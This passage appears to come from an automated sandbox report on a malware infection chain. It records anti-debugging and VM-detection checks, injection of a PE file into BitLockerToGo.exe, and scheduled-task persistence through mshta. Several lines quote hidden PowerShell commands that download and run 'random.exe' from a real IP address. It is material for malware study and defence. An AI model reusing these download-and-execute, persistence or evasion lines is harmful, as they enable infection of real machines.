Source: powershell.exe, 00000008.00000002.1818275027.000001F33A1B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.1726879593.0000000008000000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2
Source: chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaremail
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
Source: powershell.exe, 00000008.00000002.1818275027.000001F33A188000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: powershell.exe, 00000005.00000002.1713583047.0000000006D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: fvmwaremail
Source: chromium.exe, 0000001B.00000003.2515605058.000001D127750000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "rediffmail.com", "freenet.de", "vmwaremail", "webmail.co.za", "netzero", "mailfence", "juno",
Source: powershell.exe, 00000005.00000002.1713135353.0000000006C70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y4
Source: mshta.exe, 00000007.00000003.1696454411.00000264642D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chromium.exe, 0000001B.00000002.2545605526.000001D12803C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: chromium.exe, 0000001B.00000003.2521693454.000001D1278CD000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545273586.000001D1278CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if "qemu" in platform.platform().lower():
Source: chromium.exe, 0000001B.00000002.2545605526.000001D12803C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: fvmware'drain
Source: chromium.exe, 0000001B.00000002.2545273586.000001D1278CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if 'vmware' in proc.info['name'].lower() or 'virtualbox' in proc.info['name'].lower():
Source: chromium.exe, 0000001B.00000002.2545605526.000001D12803C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: fqemu
Source: powershell.exe, 00000008.00000002.1818275027.000001F33A188000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: chromium.exe, 0000001B.00000002.2545273586.000001D1278CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if "vmware" in platform.platform().lower():
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000A.00000002.1767523794.0000000000AF0000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000B.00000002.1802689397.0000000000870000.00000040.00000001.01000000.0000000F.sdmp, rapes.exe, 0000000C.00000002.1807867584.0000000000870000.00000040.00000001.01000000.0000000F.sdmp, TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000D.00000002.1829358941.0000000000AF0000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: SvhQA35.exe, 00000018.00000003.2573522291.00000235A8E71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j2a+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: powershell.exe, 00000005.00000002.1713135353.0000000006C70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ ),

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE

System information queried: ModuleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE

Code function: 10_2_053406BE rdtsc

10_2_053406BE

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AEEAA2 BlockInput,

0_2_00AEEAA2

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00AA2622

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00A742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A742DE

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00A94CE8 mov eax, dword ptr fs:[00000030h]

0_2_00A94CE8

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AD0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00AD0B62

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AA2622
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A9083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A9083F
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A909D5 SetUnhandledExceptionFilter,	0_2_00A909D5
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A90C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00A90C21
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF252A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00007FFDFF252A70
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF253028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00007FFDFF253028
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF3DDC70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00007FFDFF3DDC70
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A212B IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00007FFE004A212B
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E1521C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00007FFE0E1521C0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E151C00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00007FFE0E151C00
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E17A9E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00007FFE0E17A9E8

Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_3152.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_7184.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_1720.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6768.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7488.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5992.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 4080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 2136, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: ce4pMzk[1].exe.20.dr, Program.cs	Reference to suspicious API methods: SABPDelegates.SABP(GetModuleHandle, GetProcAddress, VirtualProtect)
Source: ce4pMzk[1].exe.20.dr, Program.cs	Reference to suspicious API methods: SABPDelegates.SABP(GetModuleHandle, GetProcAddress, VirtualProtect)
Source: ce4pMzk[1].exe.20.dr, Lostboys.cs	Reference to suspicious API methods: LoadLibrary(text)
Source: 28.0.ce4pMzk.exe.21039bd3fe8.1.raw.unpack, Options.cs	Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, (uint)array.Length, 12288u, 64u)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 51D008
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E1000
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6FD000
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 70A000
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 70C000
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 70D000

Source: C:\Users\user\Desktop\5c9465cda4.exe

0_2_00AD1201

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AB2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AB2BA5

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00ADB226 SendInput,keybd_event,

0_2_00ADB226

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AF22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_00AF22DA

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE "C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE "C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE"	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe "C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe "C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe "C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe "C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10106680121\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe "C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn EqihCmasJwG /tr "mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE "C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE "C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "s9rWGma3f0H" /tr "mshta \"C:\Temp\4LrdSfC7c.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\4LrdSfC7c.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
